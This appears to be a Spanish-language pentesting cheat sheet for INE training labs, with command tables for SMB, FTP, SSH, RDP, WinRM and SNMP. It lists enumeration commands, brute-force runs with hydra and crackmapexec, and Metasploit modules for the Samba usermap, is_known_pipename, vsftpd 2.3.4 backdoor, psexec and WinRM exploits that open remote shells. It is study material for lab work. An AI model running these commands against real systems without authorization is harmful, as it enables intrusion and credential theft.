# Host & Network Pentesting ### SMB (port 445)
DescriptionCommand
Ver los protocolosnmap -p445 --script smb-protocols demo.ine.local
Ver el modo de seguridadnmap -p445 --script smb-security-mode demo.ine.local
Enumerar las sesionesnmap -p445 --script smb-enum-sessions demo.ine.local
Enumerar las sesiones teniendo credencialesnmap -p445 --script smb-enum-sessions --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local
Enumerar los sharesnmap -p445 --script smb-enum-shares demo.ine.local
Enumerar los shares teniendo credenciales

nmap -p445 --script smb-enum-shares --script-args

smbusername=administrator,smbpassword=smbserver_771 demo.ine.local

Enumerar los usuarios teniendo credencialesnmap -p445 --script smb-enum-users --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local
Enumerar las estadísticas del servidor teniendo credencialesnmap -p445 --script smb-server-stats --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local
Enumerar los dominios teniendo credencialesnmap -p445 --script smb-enum-domains --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local
Enumerar los grupos teniendo credencialesnmap -p445 --script smb-enum-groups --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local
Enumerar los servicios teniendo credencialesnmap -p445 --script smb-enum-services --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local
Enumerar los shares teniendo credencialesnmap -p445 --script smb-enum-shares,smb-ls --script-args smbusername=administrator,smbpassword=smbserver_771 demo.ine.local
Enumerar shares con acceso anonymous

//vim scriptEnum.sh

#!/bin/bash

ip="10.10.10.10" # Cambiá por la IP de tu target

wordlist="shares.txt"

while read share; do

echo -e "\n[-] Intentando acceder a: $share"

output=$(smbclient "//$ip/$share" -N -c 'ls' 2>/dev/null)

if [[ -n "$output" ]]; then

echo "[+] Share $share accesible y tiene contenido:"

echo "$output"

else

echo "[-] Sin acceso o sin contenido visible."

fi

done < "$wordlist"

Conectarse por smbclientsmbclient //target.ine.local/ -U
Enumerar puertos UDPnmap -sU --top-ports 25 demo.ine.local
Ver el workgroupnmap -sCV demo.ine.local
Conocer la versión exactanmap --script smb-os-discovery.nse -p 445 demo.ine.local
Conocer la versión exacta con Metasploit

msfconsole -q

use auxiliary/scanner/smb/smb_version

set RHOSTS demo.ine.local

exploit

Si tiene versión 3.0.20use exploit/multi/samba/usermap_script
Encontrar el nombre del NETBIOS usando nmblookupnmblookup -A demo.ine.local
Determinar si admite conexión anonymous (si lista los shares es que sí)smbclient -L demo.ine.local -N
Determinar si admine conexión anonima usando rpcclient (si no muestra errores es que sí)rpcclient -U "" -N demo.ine.local
Enumerar todo como anonymousenum4linux -a target.ine.local
Enumerar todo con credencialesenum4linux -u <user> -p <password> -U <ip>
Fuerza bruta a Sambahydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt smb://target2.ine.local
Enumerar credenciales con metasploit

auxiliary/scanner/smb/smb_login

set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt

set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

set RHOSTS demo.ine.local

set VERBOSE false

exploit


Chequear permisos de los shares con Crackmapexec

crackmapexec smb target2.ine.local -u

administrator -p pineapple --shares

Para fuerza bruta, si es dialecto 1 usar hydra, sino, usar crackmapexeccrackmapexec smb target.ine.local -u tom -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
Enumerar shares y ver sus permisos con smbmapsmbmap -u admin -p password1 -H demo.ine.local
Si es Samba smbd 3.X - 4.X

msfconsole -q

use exploit/linux/samba/is_known_pipename

set RHOST

exploit

*** ### SMB with PsExec Context: For use PsExec we MUST have: * Valid credentials (User:Pass or NTLM hash) * The user must have administrator permissions on the remote machine * Port 445 must be open * ADMIN$ share must be accessible * The machine policy must allow remote execution (default) * Firewall mustn't be blocking this action Usage: 1. Enum protocols and dialects nmap -p445 --script smb-protocols demo.ine.local 2. Find valid credentials: ```bash msfconsole -q use auxiliary/scanner/smb/smb_login set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt set RHOSTS demo.ine.local set VERBOSE false exploit ``` 3. With admin credentials, run psexec ```bash msfconsole -q use exploit/windows/smb/psexec set RHOSTS demo.ine.local set SMBUser Administrator set SMBPass qwertyuiop exploit shell ``` *** ### FTP (port 21) | Description | Command | | --------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Conectarse | ftp target.ine.local | | Ver la versión | auxiliary/scanner/ftp/ftp\_version | | Hacer fuerza bruta con Metasploit |

auxiliary/scanner/ftp/ftp\_login

set USER\_FILE /usr/share/metasploit-framework/data/wordlists/common\_users.txt

set PASS\_FILE /usr/share/metasploit-framework/data/wordlists/unix\_passwords.txt

| | Hacer fuerza bruta con Hydra | hydra -L users.txt -P passwords.txt | | Conectarse con credenciales | ftp | | Si tiene vsftpd 2.3.4 |

nmap -p 21 --script vuln demo.ine.local
msfconsole -q

use exploit/unix/ftp/vsftpd\_234\_backdoor

set RHOSTS

exploit

| *** ### SSH - Metasploit (port 22) | Command | Description | | ---------------------------------- | ------------------ | | auxiliary/scanner/ssh/ssh\_version | Conocer la version | | auxiliary/scanner/ssh/ssh\_login | Hacer fuerza bruta | *** ### RDP (port 3389) | Command | Description | | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------ | |

msfconsole -q
use auxiliary/scanner/rdp/rdp\_scanner

set RHOSTS demo.ine.local

set RPORT \

exploit

| Por default RDP está en el 3389, pero podemos chequearlo con este módulo | |

hydra -L /usr/share/metasploit-framework/data/wordlists/common\_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix\_passwords.txt rdp\://demo.ine.local -s 3333

hydra -l bob -P \ -s 80 target1.ine.local http-get “/” -V

dirb -u bob:password\_123321

| Fuerza bruta con Hydra | | xfreerdp /u:administrator /p:qwertyuiop /v:demo.ine.local:3333 | Acceder a RDP con credenciales | *** ### WinRM - Metasploit (port 5985/5986) | Command | Description | | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------- | | nmap --top-ports 7000 demo.ine.local | Ver puertos | |

msfconsole -q

use auxiliary/scanner/winrm/winrm\_login

set RHOSTS demo.ine.local

set USER\_FILE /usr/share/metasploit-framework/data/wordlists/common\_users.txt

set PASS\_FILE /usr/share/metasploit-framework/data/wordlists/unix\_passwords.txt

set VERBOSE false

set PASSWORD anything

exploit

|

Login con fuerza bruta.
(Hay que poner una PASSWORD cualquiera porque el módulo lo requiere, pero no se tiene en cuenta)

| |

use auxiliary/scanner/winrm/winrm\_auth\_methods

set RHOSTS demo.ine.local

exploit

| Chequear método de autenticación | |

use auxiliary/scanner/winrm/winrm\_cmd

set RHOSTS demo.ine.local

set USERNAME administrator

set PASSWORD tinkerbell

set CMD whoami

exploit

| Conectarse y ejecutar whoami | |

use exploit/windows/winrm/winrm\_script\_exec

set RHOSTS demo.ine.local

set USERNAME administrator

set PASSWORD tinkerbell

set FORCE\_VBS true

exploit

shell

| Obtener una shell | *** ### SNMP (port 161) | Command | Description | | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------- | | nmap -sU -p161 demo.ine.local | Chequear que esté el puerto abierto | | nmap -sU -p 161 --script=snmp-brute demo.ine.local | Encontrar el string community server (auth key para acceder a snmp) | | snmpwalk -v 1 -c public demo.ine.local | Encontrar toda la información con snmpwalk | |

nmap -sU -p 161 --script snmp-\* demo.ine.local > snmp\_output

ls

cat snmp\_output

| Si no es human-readable, ejecutar ésto | | hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix\_passwords.txt demo.ine.local smb | Login con fuerza bruta | |

msfconsole -q

use exploit/windows/smb/psexec

show options

set RHOSTS demo.ine.local

set SMBUSER administrator

set SMBPASS elizabeth

exploit

| Ganar una session meterpreter |